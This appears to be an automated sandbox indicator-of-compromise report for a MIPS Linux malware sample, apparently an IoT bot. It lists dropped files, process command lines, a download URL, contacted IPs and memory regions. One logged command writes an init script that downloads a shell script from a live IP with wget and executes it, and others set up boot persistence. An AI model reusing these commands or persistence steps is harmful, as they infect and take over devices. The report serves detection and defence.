IOC Report
mips.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
mips.nn.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/mips.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.6Os42J (deleted)
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/mips.nn.elf
/tmp/mips.nn.elf
/tmp/mips.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/mips.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/mips.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/mips.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
/tmp/mips.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mips.nn.elf
/tmp/mips.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/mips.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
/tmp/mips.nn.elf
-
/tmp/mips.nn.elf
-
/tmp/mips.nn.elf
-
/tmp/mips.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 36 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/curl.sh
unknown
http://94.156.227.233/lol.sh
unknown
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
71.85.172.121
unknown
United States
52.102.179.50
unknown
United States
130.99.1.125
unknown
United States
30.241.227.29
unknown
United States
210.122.139.47
unknown
Korea Republic of
3.90.193.102
unknown
United States
96.15.206.62
unknown
United States
98.62.209.133
unknown
United States
133.176.177.55
unknown
Japan
125.255.90.208
unknown
Japan
43.213.178.195
unknown
Japan
123.196.85.13
unknown
China
16.232.191.72
unknown
United States
60.248.84.35
unknown
Taiwan; Republic of China (ROC)
179.120.169.70
unknown
Brazil
140.45.68.171
unknown
United States
24.104.27.194
unknown
United States
213.237.62.150
unknown
Denmark
65.242.120.220
unknown
United States
23.57.209.219
unknown
United States
177.28.201.152
unknown
Brazil
74.46.133.37
unknown
United States
123.62.119.123
unknown
China
78.160.247.18
unknown
Turkey
60.146.162.245
unknown
Japan
186.12.11.37
unknown
Argentina
20.25.224.111
unknown
United States
45.2.160.226
unknown
Canada
117.198.224.153
unknown
India
216.134.58.20
unknown
United States
66.195.45.192
unknown
United States
222.39.120.74
unknown
China
204.181.145.33
unknown
United States
8.195.247.249
unknown
United States
88.241.210.57
unknown
Turkey
210.178.237.249
unknown
Korea Republic of
215.50.167.215
unknown
United States
78.140.240.209
unknown
Russian Federation
57.236.105.99
unknown
Belgium
18.159.41.41
unknown
United States
197.153.128.251
unknown
Morocco
211.52.79.67
unknown
Korea Republic of
93.209.197.112
unknown
Germany
70.199.108.94
unknown
United States
26.0.17.143
unknown
United States
43.112.217.239
unknown
Japan
159.73.177.227
unknown
Australia
68.177.81.58
unknown
United States
202.61.108.43
unknown
unknown
111.233.254.164
unknown
Japan
34.8.131.16
unknown
United States
112.207.142.132
unknown
Philippines
197.78.59.83
unknown
South Africa
83.59.238.196
unknown
Spain
18.45.150.132
unknown
United States
50.219.45.146
unknown
United States
106.194.185.156
unknown
India
140.44.148.110
unknown
United States
110.250.130.150
unknown
China
82.173.157.58
unknown
Netherlands
25.190.203.72
unknown
United Kingdom
112.131.194.70
unknown
China
214.218.33.123
unknown
United States
180.51.101.201
unknown
Japan
123.162.233.163
unknown
China
177.112.78.39
unknown
Brazil
2.29.117.56
unknown
United Kingdom
134.125.19.84
unknown
United States
163.168.179.99
unknown
Switzerland
34.201.15.152
unknown
United States
51.249.201.114
unknown
United States
25.91.159.36
unknown
United Kingdom
31.71.159.62
unknown
United Kingdom
16.16.85.23
unknown
United States
158.68.106.184
unknown
United States
65.188.142.178
unknown
United States
109.202.11.184
unknown
Russian Federation
99.214.146.212
unknown
Canada
23.190.38.252
unknown
Reserved
50.99.128.40
unknown
Canada
53.29.64.118
unknown
Germany
63.14.20.134
unknown
United States
179.147.151.249
unknown
Brazil
142.139.14.245
unknown
Canada
162.89.43.62
unknown
United States
84.59.198.152
unknown
Germany
101.241.166.175
unknown
China
62.79.232.196
unknown
Denmark
40.176.186.198
unknown
United States
39.189.18.12
unknown
China
198.207.3.101
unknown
United States
46.147.58.102
unknown
Russian Federation
139.38.79.26
unknown
United States
125.40.151.243
unknown
China
216.186.108.115
unknown
United States
18.43.36.150
unknown
United States
24.100.12.157
unknown
United States
223.95.137.37
unknown
China
115.217.42.191
unknown
China
68.167.155.178
unknown
United States
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7fcca4421000
page execute read
malicious
7fcd2a143000
page read and write
7fcd29bf1000
page read and write
7fcd24000000
page read and write
55a7798c9000
page execute and read and write
7fcd2a26c000
page read and write
7fcca4467000
page read and write
55a77aa9d000
page read and write
7fcd2a274000
page read and write
55a777639000
page execute read
7fcca4462000
page read and write
55a7778cb000
page read and write
7ffddbe11000
page read and write
55a7778c1000
page read and write
7fcd24021000
page read and write
7fcd29c31000
page read and write
7fcd29592000
page read and write
7fcd295a0000
page read and write
55a7798e0000
page read and write
7ffddbff1000
page execute read
7fcd29850000
page read and write
7fcd29c14000
page read and write
7fcd2a2b9000
page read and write
7fcd29f62000
page read and write
7fcd28d8a000
page read and write
There are 15 hidden memdumps, click here to show them.